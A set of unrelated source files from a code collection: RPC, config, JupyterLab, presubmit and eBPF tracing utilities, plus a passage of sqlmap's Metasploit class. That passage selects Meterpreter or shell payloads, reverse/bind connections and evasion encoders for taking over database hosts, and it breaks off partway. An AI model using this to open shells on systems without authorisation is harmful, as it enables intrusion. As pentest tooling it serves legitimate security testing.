for exceptionFile in exceptionList:
datafiles.remove(exceptionFile)
LOGGER.debug(f'list of data files: {datafiles}')
for datafile in datafiles:
sqlFile = os.path.splitext(os.path.basename(datafile))[0] + '.sql'
sqlFileFullPath = os.path.join(sqlDir, sqlFile)
if not os.path.exists(sqlFileFullPath):
msg = f'the sql file {sqlFileFullPath} does not exist'
raise ValueError(msg)
createDb = CreateDBTable(sqlFileFullPath)
createDb.createTable()
createDb.listTables()
createDb.loadData(datafile, False)
|
the-stack_106_16971
|
import os
settings = {
'base_dir': os.path.dirname(__file__),
# cash True or False
'cash': False,
# set name for apps dir
'apps_dir': os.path.abspath(os.path.dirname(__file__) + '/apps'),
# set apps folder name
'apps_folder_name': 'apps',
# set routes file
'routes_file': 'routes.py',
# set controller file
'controller': 'controller.py',
# set list of apps
'apps': [
'main',
],
}
def get_settings():
return settings
|
the-stack_106_16972
|
"""
Copyright (c) 2011 Jeff Garzik
AuthServiceProxy has the following improvements over python-jsonrpc's
ServiceProxy class:
- HTTP connections persist for the life of the AuthServiceProxy object
(if server supports HTTP/1.1)
- sends protocol 'version', per JSON-RPC 1.1
- sends proper, incrementing 'id'
- sends Basic HTTP authentication headers
- parses all JSON numbers that look like floats as Decimal
- uses standard Python json lib
Previous copyright, from python-jsonrpc/jsonrpc/proxy.py:
Copyright (c) 2007 Jan-Klaas Kollhof
This file is part of jsonrpc.
jsonrpc is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
This software is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this software; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
try:
import http.client as httplib
except ImportError:
import httplib
import base64
import decimal
import json
import logging
import socket
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
USER_AGENT = "AuthServiceProxy/0.1"
HTTP_TIMEOUT = 30
log = logging.getLogger("BitcoinRPC")
class JSONRPCException(Exception):
def __init__(self, rpc_error):
try:
errmsg = '%(message)s (%(code)i)' % rpc_error
except (KeyError, TypeError):
errmsg = ''
Exception.__init__(self, errmsg)
self.error = rpc_error
def EncodeDecimal(o):
if isinstance(o, decimal.Decimal):
return str(o)
raise TypeError(repr(o) + " is not JSON serializable")
class AuthServiceProxy(object):
__id_count = 0
# ensure_ascii: escape unicode as \uXXXX, passed to json.dumps
def __init__(self, service_url, service_name=None, timeout=HTTP_TIMEOUT, connection=None, ensure_ascii=True):
self.__service_url = service_url
self._service_name = service_name
self.ensure_ascii = ensure_ascii # can be toggled on the fly by tests
self.__url = urlparse.urlparse(service_url)
if self.__url.port is None:
port = 80
else:
port = self.__url.port
(user, passwd) = (self.__url.username, self.__url.password)
try:
user = user.encode('utf8')
except AttributeError:
pass
try:
passwd = passwd.encode('utf8')
except AttributeError:
pass
authpair = user + b':' + passwd
self.__auth_header = b'Basic ' + base64.b64encode(authpair)
if connection:
# Callables re-use the connection of the original proxy
self.__conn = connection
elif self.__url.scheme == 'https':
self.__conn = httplib.HTTPSConnection(self.__url.hostname, port,
timeout=timeout)
else:
self.__conn = httplib.HTTPConnection(self.__url.hostname, port,
timeout=timeout)
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
if self._service_name is not None:
name = "%s.%s" % (self._service_name, name)
return AuthServiceProxy(self.__service_url, name, connection=self.__conn)
def _request(self, method, path, postdata):
'''
Do a HTTP request, with retry if we get disconnected (e.g. due to a timeout).
This is a workaround for https://bugs.python.org/issue3566 which is fixed in Python 3.5.
'''
headers = {'Host': self.__url.hostname,
'User-Agent': USER_AGENT,
'Authorization': self.__auth_header,
'Content-type': 'application/json'}
try:
self.__conn.request(method, path, postdata, headers)
return self._get_response()
except httplib.BadStatusLine as e:
if e.line == "''": # if connection was closed, try again
self.__conn.close()
self.__conn.request(method, path, postdata, headers)
return self._get_response()
else:
raise
except (BrokenPipeError,ConnectionResetError):
# Python 3.5+ raises BrokenPipeError instead of BadStatusLine when the connection was reset
# ConnectionResetError happens on FreeBSD with Python 3.4
self.__conn.close()
self.__conn.request(method, path, postdata, headers)
return self._get_response()
def __call__(self, *args, **argsn):
AuthServiceProxy.__id_count += 1
log.debug("-%s-> %s %s"%(AuthServiceProxy.__id_count, self._service_name,
json.dumps(args, default=EncodeDecimal, ensure_ascii=self.ensure_ascii)))
if args and argsn:
raise ValueError('Cannot handle both named and positional arguments')
postdata = json.dumps({'version': '1.1',
'method': self._service_name,
'params': args or argsn,
'id': AuthServiceProxy.__id_count}, default=EncodeDecimal, ensure_ascii=self.ensure_ascii)
response = self._request('POST', self.__url.path, postdata.encode('utf-8'))
if response['error'] is not None:
raise JSONRPCException(response['error'])
elif 'result' not in response:
raise JSONRPCException({
'code': -343, 'message': 'missing JSON-RPC result'})
else:
return response['result']
def _batch(self, rpc_call_list):
postdata = json.dumps(list(rpc_call_list), default=EncodeDecimal, ensure_ascii=self.ensure_ascii)
log.debug("--> "+postdata)
return self._request('POST', self.__url.path, postdata.encode('utf-8'))
def _get_response(self):
try:
http_response = self.__conn.getresponse()
except socket.timeout as e:
raise JSONRPCException({
'code': -344,
'message': '%r RPC took longer than %f seconds. Consider '
'using larger timeout for calls that take '
'longer to return.' % (self._service_name,
self.__conn.timeout)})
if http_response is None:
raise JSONRPCException({
'code': -342, 'message': 'missing HTTP response from server'})
content_type = http_response.getheader('Content-Type')
if content_type != 'application/json':
raise JSONRPCException({
'code': -342, 'message': 'non-JSON HTTP response with \'%i %s\' from server' % (http_response.status, http_response.reason)})
responsedata = http_response.read().decode('utf8')
response = json.loads(responsedata, parse_float=decimal.Decimal)
if "error" in response and response["error"] is None:
log.debug("<-%s- %s"%(response["id"], json.dumps(response["result"], default=EncodeDecimal, ensure_ascii=self.ensure_ascii)))
else:
log.debug("<-- "+responsedata)
return response
|
the-stack_106_16976
|
# -*- coding: utf-8 -*-
try:
from collections.abc import MutableMapping  # Python 3.3+
except ImportError:
from collections import MutableMapping  # Python 2 fallback
import inspect
def _ipython(local, banner):
from IPython.terminal.embed import InteractiveShellEmbed
from IPython.terminal.ipapp import load_default_config
InteractiveShellEmbed.clear_instance()
shell = InteractiveShellEmbed.instance(
banner1=banner,
user_ns=local,
config=load_default_config()
)
shell()
# class GlobalDict(DictMixin):
# def __init__(self, dict=None, **kwargs):
# self.data = {}
# if dict is not None:
# self.update(dict)
# if len(**kwargs):
# self.update(kwargs)
# @abstractmethod
# def __getitem__(self, key):
# retrun self.data[id]
#
# @abstractmethod
# def __setitem__(self, key, value):
# self.data[id] = value
#
# @abstractmethod
# def __delitem__(self, key):
# del self.data[id]
#
# def keys(self):
# return self.data.keys()
class ConfigG(dict):
def __init__(self, *args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries, but keyword arguments are not recommended because
their insertion order is arbitrary.
'''
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__root = root = [] # sentinel node
root[:] = [root, root, None]
self.__map = {}
self.__update(*args, **kwds)
def __getattr__(self,name):
try:
return dict.__getitem__(self, name)
except:
raise AttributeError()
def __setattr__(self,name,value):
if name.startswith('_ConfigG__'):
return dict.__setitem__(self, name, value)
else:
return self.__setitem__(name, value)
def __setitem__(self, key, value, dict_setitem=dict.__setitem__):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
root = self.__root
last = root[0]
last[1] = root[0] = self.__map[key] = [last, root, key]
return dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link_prev, link_next, _ = self.__map.pop(key)
link_prev[1] = link_next # update link_prev[NEXT]
link_next[0] = link_prev # update link_next[PREV]
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
root = self.__root
curr = root[1] # start at the first node
while curr is not root:
yield curr[2] # yield the curr[KEY]
curr = curr[1] # move to next node
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root[0] # start at the last node
while curr is not root:
yield curr[2] # yield the curr[KEY]
curr = curr[0] # move to previous node
def clear(self):
'od.clear() -> None. Remove all items from od.'
# root = self.__root
# root[:] = [root, root, None]
#self.__map.clear()
#dict.clear(self)
for k in self:
if k.startswith('_ConfigG__'):
pass
else:
self.pop(k)
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) pairs in od'
for k in self:
yield (k, self[k])
update = MutableMapping.update
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def popitem(self, last=True):
'''od.popitem() -> (k, v), return and remove a (key, value) pair.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
key = next(reversed(self) if last else iter(self))
value = self.pop(key)
return key, value
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(ConfigG()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S.
If not specified, the value defaults to None.
'''
self = cls()
for key in iterable:
self[key] = value
return self
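# Illustrative usage: keys are reachable both as items and as attributes, and
# insertion order is preserved (names below are placeholders):
#   cfg = ConfigG()
#   cfg.db_host = 'localhost'    # equivalent to cfg['db_host'] = 'localhost'
#   cfg['debug'] = True
#   list(cfg.keys())             # -> ['db_host', 'debug']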
G = ConfigG()
_ipython(None, '')
|
the-stack_106_16978
|
# coding: utf-8
"""Jupyter Lab Launcher handlers"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import os
from tornado import web, template
from notebook.base.handlers import IPythonHandler, FileFindHandler
from jinja2 import FileSystemLoader, TemplateError
from notebook.utils import url_path_join as ujoin
from traitlets import HasTraits, Bool, Unicode
from .workspaces_handler import WorkspacesHandler
from .settings_handler import SettingsHandler
from .themes_handler import ThemesHandler
# -----------------------------------------------------------------------------
# Module globals
# -----------------------------------------------------------------------------
# The default urls for the application.
default_public_url = '/lab/static/'
default_workspaces_url = '/lab/workspaces/'
default_workspaces_api_url = '/lab/api/workspaces/'
default_settings_url = '/lab/api/settings/'
default_themes_url = '/lab/api/themes/'
default_tree_url = '/lab/tree/'
DEFAULT_TEMPLATE = template.Template("""
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<h2>Cannot find template: "{{name}}"</h2>
<p>In "{{path}}"</p>
</body>
</html>
""")
class LabHandler(IPythonHandler):
"""Render the JupyterLab View."""
def initialize(self, lab_config):
self.lab_config = lab_config
self.file_loader = FileSystemLoader(lab_config.templates_dir)
@web.authenticated
@web.removeslash
def get(self):
config = self.lab_config
settings_dir = config.app_settings_dir
# Handle page config data.
page_config = self.settings.setdefault('page_config_data', {})
terminals = self.settings.get('terminals_available', False)
server_root = self.settings.get('server_root_dir', '')
server_root = server_root.replace(os.sep, '/')
page_config.setdefault('terminalsAvailable', terminals)
page_config.setdefault('ignorePlugins', [])
page_config.setdefault('serverRoot', server_root)
mathjax_config = self.settings.get('mathjax_config',
'TeX-AMS_HTML-full,Safe')
page_config.setdefault('mathjaxConfig', mathjax_config)
page_config.setdefault('mathjaxUrl', self.mathjax_url)
for name in config.trait_names():
page_config[_camelCase(name)] = getattr(config, name)
# Load the current page config file if available.
page_config_file = os.path.join(settings_dir, 'page_config.json')
if os.path.exists(page_config_file):
with open(page_config_file) as fid:
try:
page_config.update(json.load(fid))
except Exception as e:
print(e)
# Handle error when the assets are not available locally.
local_index = os.path.join(config.static_dir, 'index.html')
if config.static_dir and not os.path.exists(local_index):
self.write(self.render_template(
'error.html', static_dir=config.static_dir
))
return
# Write the template with the config.
self.write(self.render_template('index.html', page_config=page_config))
def get_template(self, name):
return self.file_loader.load(self.settings['jinja2_env'], name)
def render_template(self, name, **ns):
try:
return IPythonHandler.render_template(self, name, **ns)
except TemplateError:
return DEFAULT_TEMPLATE.generate(
name=name, path=self.lab_config.templates_dir
)
class LabConfig(HasTraits):
"""The lab application configuration object.
"""
app_name = Unicode('', help='The name of the application.')
app_version = Unicode('', help='The version of the application.')
app_namespace = Unicode('', help='The namespace of the application.')
page_url = Unicode('/lab', help='The url path for the application.')
app_settings_dir = Unicode('', help='The application settings directory.')
templates_dir = Unicode('', help='The application templates directory.')
static_dir = Unicode('',
help=('The optional location of local static files. '
'If given, a static file handler will be '
'added.'))
public_url = Unicode(default_public_url,
help=('The url public path for static application '
'files. This can be a CDN if desired.'))
settings_url = Unicode(default_settings_url,
help='The url path of the settings handler.')
user_settings_dir = Unicode('',
help=('The optional location of the user '
'settings directory.'))
schemas_dir = Unicode('',
help=('The optional location of the settings '
'schemas directory. If given, a handler will '
'be added for settings.'))
workspaces_dir = Unicode('',
help=('The optional location of the saved '
'workspaces directory. If given, a handler '
'will be added for workspaces.'))
workspaces_url = Unicode(default_workspaces_url,
help='The url path of the workspaces handler.')
themes_url = Unicode(default_themes_url, help='The theme url.')
themes_dir = Unicode('',
help=('The optional location of the themes '
'directory. If given, a handler will be added '
'for themes.'))
tree_url = Unicode(default_tree_url,
help='The url path of the tree handler.')
cache_files = Bool(True,
help=('Whether to cache files on the server. '
'This should be `True` except in dev mode.'))
class NotFoundHandler(LabHandler):
def render_template(self, name, **ns):
if 'page_config' in ns:
ns['page_config'] = ns['page_config'].copy()
ns['page_config']['notFoundUrl'] = self.request.path
return LabHandler.render_template(self, name, **ns)
def add_handlers(web_app, config):
"""Add the appropriate handlers to the web app.
"""
# Normalize directories.
for name in config.trait_names():
if not name.endswith('_dir'):
continue
value = getattr(config, name)
setattr(config, name, value.replace(os.sep, '/'))
# Set up the main page handler and tree handler.
base_url = web_app.settings['base_url']
lab_url = ujoin(base_url, config.page_url)
tree_url = ujoin(base_url, config.tree_url + r'.+')
handlers = [
(lab_url, LabHandler, {'lab_config': config}),
(tree_url, LabHandler, {'lab_config': config})
]
# Cache all or none of the files depending on the `cache_files` setting.
no_cache_paths = [] if config.cache_files else ['/']
# Handle local static assets.
if config.static_dir:
config.public_url = ujoin(base_url, default_public_url)
handlers.append((config.public_url + '(.*)', FileFindHandler, {
'path': config.static_dir,
'no_cache_paths': no_cache_paths
}))
# Handle local settings.
if config.schemas_dir:
config.settings_url = ujoin(base_url, default_settings_url)
settings_path = config.settings_url + '(?P<section_name>.+)'
handlers.append((settings_path, SettingsHandler, {
'app_settings_dir': config.app_settings_dir,
'schemas_dir': config.schemas_dir,
'settings_dir': config.user_settings_dir
}))
# Handle saved workspaces.
if config.workspaces_dir:
# Handle JupyterLab client URLs that include workspaces.
config.workspaces_url = ujoin(base_url, default_workspaces_url)
workspaces_path = ujoin(config.workspaces_url, r'/.+')
handlers.append((workspaces_path, LabHandler, {'lab_config': config}))
# Handle API requests for workspaces.
config.workspaces_api_url = ujoin(base_url, default_workspaces_api_url)
workspaces_api_path = config.workspaces_api_url + '(?P<space_name>.+)'
handlers.append((workspaces_api_path, WorkspacesHandler, {
'workspaces_url': config.workspaces_url,
'path': config.workspaces_dir
}))
# Handle local themes.
if config.themes_dir:
config.themes_url = ujoin(base_url, default_themes_url)
handlers.append((
ujoin(config.themes_url, '(.*)'),
ThemesHandler,
{
'themes_url': config.themes_url,
'path': config.themes_dir,
'no_cache_paths': no_cache_paths
}
))
# Let the lab handler act as the fallthrough option instead of a 404.
fallthrough_url = ujoin(base_url, config.page_url, r'.*')
handlers.append((fallthrough_url, NotFoundHandler, {'lab_config': config}))
web_app.add_handlers('.*$', handlers)
def _camelCase(base):
"""Convert a string to camelCase.
https://stackoverflow.com/a/20744956
"""
output = ''.join(x for x in base.title() if x.isalpha())
return output[0].lower() + output[1:]
|
the-stack_106_16980
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
def PostUploadHook(cl, change, output_api):
return output_api.EnsureCQIncludeTrybotsAreAdded(
cl,
[
'master.tryserver.chromium.linux:closure_compilation',
],
'Automatically added optional Closure bots to run on CQ.')
def CheckChangeOnUpload(input_api, output_api):
return _CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
return _CommonChecks(input_api, output_api)
# For every modified gyp file, warn if the corresponding GN file is not updated.
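# e.g. (illustrative): a change that touches foo/compiled_resources2.gyp but
# not foo/BUILD.gn will produce the warning emitted below.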
def _CheckForGNUpdate(input_api, output_api):
gyp_folders = set()
for f in input_api.AffectedFiles():
local_path = f.LocalPath()
if local_path.endswith('compiled_resources2.gyp'):
gyp_folders.add(os.path.dirname(local_path))
for f in input_api.AffectedFiles():
local_path = f.LocalPath()
dir_name = os.path.dirname(local_path)
if local_path.endswith('BUILD.gn') and dir_name in gyp_folders:
gyp_folders.remove(dir_name)
if not gyp_folders:
return []
return [output_api.PresubmitPromptWarning("""
You may have forgotten to update the BUILD.gn Closure Compilation for the
following folders:
""" + "\n".join(["- " + x for x in gyp_folders]) + """
Ping calamity@ or check go/closure-compile-gn for more details.
""")]
def _CheckForTranslations(input_api, output_api):
shared_keywords = ['i18n(']
html_keywords = shared_keywords + ['$i18n{']
js_keywords = shared_keywords + ['I18nBehavior', 'loadTimeData.']
errors = []
for f in input_api.AffectedFiles():
local_path = f.LocalPath()
# Allow translation in i18n_behavior.js.
if local_path.endswith('i18n_behavior.js'):
continue
# Allow translation in the cr_components directory.
if 'cr_components' in local_path:
continue
keywords = None
if local_path.endswith('.js'):
keywords = js_keywords
elif local_path.endswith('.html'):
keywords = html_keywords
if not keywords:
continue
for lnum, line in f.ChangedContents():
if any(keyword in line for keyword in keywords):
errors.append("%s:%d\n%s" % (f.LocalPath(), lnum, line))
if not errors:
return []
return [output_api.PresubmitError("\n".join(errors) + """
Don't embed translations directly in shared UI code. Instead, inject your
translation from the place using the shared code. For an example: see
<cr-dialog>#closeText (http://bit.ly/2eLEsqh).""")]
def _CommonChecks(input_api, output_api):
results = []
results += _CheckForTranslations(input_api, output_api)
results += _CheckForGNUpdate(input_api, output_api)
results += input_api.canned_checks.CheckPatchFormatted(input_api, output_api,
check_js=True)
try:
import sys
old_sys_path = sys.path[:]
cwd = input_api.PresubmitLocalPath()
sys.path += [input_api.os_path.join(cwd, '..', '..', '..', 'tools')]
from web_dev_style import presubmit_support
BLACKLIST = ['ui/webui/resources/js/analytics.js',
'ui/webui/resources/js/jstemplate_compiled.js']
file_filter = lambda f: f.LocalPath() not in BLACKLIST
results += presubmit_support.CheckStyle(input_api, output_api, file_filter)
finally:
sys.path = old_sys_path
return results
|
the-stack_106_16984
|
#!/usr/bin/python
# @lint-avoid-python-3-compatibility-imports
#
# threadsnoop List new thread creation.
# For Linux, uses BCC, eBPF. Embedded C.
#
# Copyright (c) 2019 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License").
# This was originally created for the BPF Performance Tools book
# published by Addison Wesley. ISBN-13: 9780136554820
# When copying or porting, include this comment.
#
# 02-Jul-2019 Brendan Gregg Ported from bpftrace to BCC.
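# Example output (illustrative; function names depend on the traced process
# and on symbol resolution, unresolved symbols are printed as raw addresses):
#   TIME(ms)   PID    COMM             FUNC
#   1892       12549  myapp            worker_main
#   1917       12549  myapp            0x7f9bbd2a9710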
from __future__ import print_function
from bcc import BPF
# load BPF program
b = BPF(text="""
#include <linux/sched.h>
struct data_t {
u64 ts;
u32 pid;
u64 start;
char comm[TASK_COMM_LEN];
};
BPF_PERF_OUTPUT(events);
void do_entry(struct pt_regs *ctx) {
struct data_t data = {};
data.ts = bpf_ktime_get_ns();
data.pid = bpf_get_current_pid_tgid() >> 32;
data.start = PT_REGS_PARM3(ctx);
bpf_get_current_comm(&data.comm, sizeof(data.comm));
events.perf_submit(ctx, &data, sizeof(data));
};
""")
b.attach_uprobe(name="pthread", sym="pthread_create", fn_name="do_entry")
print("%-10s %-6s %-16s %s" % ("TIME(ms)", "PID", "COMM", "FUNC"))
start_ts = 0
# process event
def print_event(cpu, data, size):
global start_ts
event = b["events"].event(data)
if start_ts == 0:
start_ts = event.ts
func = b.sym(event.start, event.pid)
if (func == "[unknown]"):
func = hex(event.start)
print("%-10d %-6d %-16s %s" % ((event.ts - start_ts) / 1000000,
event.pid, event.comm, func))
b["events"].open_perf_buffer(print_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
the-stack_106_16985
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
import select
import sys
import tempfile
import time
from subprocess import PIPE
from extra.cloak.cloak import cloak
from extra.cloak.cloak import decloak
from lib.core.common import dataToStdout
from lib.core.common import Backend
from lib.core.common import getLocalIP
from lib.core.common import getRemoteIP
from lib.core.common import getUnicode
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import pollProcess
from lib.core.common import randomRange
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.settings import IS_WIN
from lib.core.settings import METASPLOIT_SESSION_TIMEOUT
from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER
from lib.core.settings import UNICODE_ENCODING
from lib.core.subprocessng import blockingReadFromFD
from lib.core.subprocessng import blockingWriteToFD
from lib.core.subprocessng import Popen as execute
from lib.core.subprocessng import send_all
from lib.core.subprocessng import recv_some
if IS_WIN:
import msvcrt
class Metasploit:
"""
This class defines methods to call Metasploit for plugins.
"""
def _initVars(self):
self.connectionStr = None
self.lhostStr = None
self.rhostStr = None
self.portStr = None
self.payloadStr = None
self.encoderStr = None
self.payloadConnStr = None
self.localIP = getLocalIP()
self.remoteIP = getRemoteIP() or conf.hostname
self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli"))
self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode"))
self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom"))
if IS_WIN:
_ = conf.msfPath
while _:
if os.path.exists(os.path.join(_, "scripts")):
_ = os.path.join(_, "scripts", "setenv.bat")
break
else:
old = _
_ = normalizePath(os.path.join(_, ".."))
if _ == old:
break
self._msfCli = "%s & ruby %s" % (_, self._msfCli)
self._msfConsole = "%s & ruby %s" % (_, self._msfConsole)
self._msfEncode = "ruby %s" % self._msfEncode
self._msfPayload = "%s & ruby %s" % (_, self._msfPayload)
self._msfVenom = "%s & ruby %s" % (_, self._msfVenom)
self._msfPayloadsList = {
"windows": {
1: ("Meterpreter (default)", "windows/meterpreter"),
2: ("Shell", "windows/shell"),
3: ("VNC", "windows/vncinject"),
},
"linux": {
1: ("Shell (default)", "linux/x86/shell"),
2: ("Meterpreter (beta)", "linux/x86/meterpreter"),
}
}
self._msfConnectionsList = {
"windows": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"),
3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"),
4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"),
5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
},
"linux": {
1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"),
2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"),
}
}
self._msfEncodersList = {
"windows": {
1: ("No Encoder", "generic/none"),
2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"),
3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"),
4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"),
5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"),
6: ("Single-byte XOR Countdown Encoder", "x86/countdown"),
7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"),
8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"),
9: ("Non-Alpha Encoder", "x86/nonalpha"),
10: ("Non-Upper Encoder", "x86/nonupper"),
11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"),
12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"),
13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"),
}
}
self._msfSMBPortsList = {
"windows": {
1: ("139/TCP", "139"),
2: ("445/TCP (default)", "445"),
}
}
self._portData = {
"bind": "remote port number",
"reverse": "local port number",
}
def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1):
if Backend.isOs(OS.WINDOWS):
opSys = "windows"
else:
opSys = "linux"
message = "which %s do you want to use?" % msg
if lst:
for num, data in lst[opSys].items():
description = data[0]
if num > maxValue:
maxValue = num
if "(default)" in description:
default = num
message += "\n[%d] %s" % (num, description)
else:
message += " [%d] " % default
choice = readInput(message, default="%d" % default)
if not choice:
if lst:
choice = getUnicode(default, UNICODE_ENCODING)
else:
return default
elif not choice.isdigit():
logger.warn("invalid value, only digits are allowed")
return self._skeletonSelection(msg, lst, maxValue, default)
elif int(choice) > maxValue or int(choice) < 1:
logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue)
return self._skeletonSelection(msg, lst, maxValue, default)
choice = int(choice)
if lst:
choice = lst[opSys][choice][1]
return choice
def _selectSMBPort(self):
return self._skeletonSelection("SMB port", self._msfSMBPortsList)
def _selectEncoder(self, encode=True):
# This is always the case except for --os-bof where the user can
# choose which encoder to use. When called from --os-pwn the encoder
# is always x86/alpha_mixed - used for sys_bineval() and
# shellcodeexec
if isinstance(encode, basestring):
return encode
elif encode:
return self._skeletonSelection("payload encoding", self._msfEncodersList)
def _selectPayload(self):
if Backend.isOs(OS.WINDOWS) and conf.privEsc:
infoMsg = "forcing Metasploit payload to Meterpreter because "
infoMsg += "it is the only payload that can be used to "
infoMsg += "escalate privileges via 'incognito' extension, "
infoMsg += "'getsystem' command or post modules"
logger.info(infoMsg)
_payloadStr = "windows/meterpreter"
else:
_payloadStr = self._skeletonSelection("payload", self._msfPayloadsList)
if _payloadStr == "windows/vncinject":
choose = False
if Backend.isDbms(DBMS.MYSQL):
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, it is likely that the the VNC "
debugMsg += "injection will be successful"
logger.debug(debugMsg)
elif Backend.isDbms(DBMS.PGSQL):
choose = True
warnMsg = "by default PostgreSQL on Windows runs as "
warnMsg += "postgres user, it is unlikely that the VNC "
warnMsg += "injection will be successful"
logger.warn(warnMsg)
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
choose = True
warnMsg = "it is unlikely that the VNC injection will be "
warnMsg += "successful because usually Microsoft SQL Server "
warnMsg += "%s runs as Network Service " % Backend.getVersion()
warnMsg += "or the Administrator is not logged in"
logger.warn(warnMsg)
if choose:
message = "what do you want to do?\n"
message += "[1] Give it a try anyway\n"
message += "[2] Fall back to Meterpreter payload (default)\n"
message += "[3] Fall back to Shell payload"
while True:
choice = readInput(message, default="2")
if not choice or choice == "2":
_payloadStr = "windows/meterpreter"
break
elif choice == "3":
_payloadStr = "windows/shell"
break
elif choice == "1":
if Backend.isDbms(DBMS.PGSQL):
logger.warn("beware that the VNC injection might not work")
break
elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")):
break
elif not choice.isdigit():
logger.warn("invalid value, only digits are allowed")
elif int(choice) < 1 or int(choice) > 2:
logger.warn("invalid value, it must be 1 or 2")
if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter":
warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "")
warnMsg += "with the Meterpreter payload. Falling back to "
warnMsg += "reverse TCP"
logger.warn(warnMsg)
self.connectionStr = "reverse_tcp"
return _payloadStr
def _selectPort(self):
for connType, connStr in self._portData.items():
if self.connectionStr.startswith(connType):
return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))
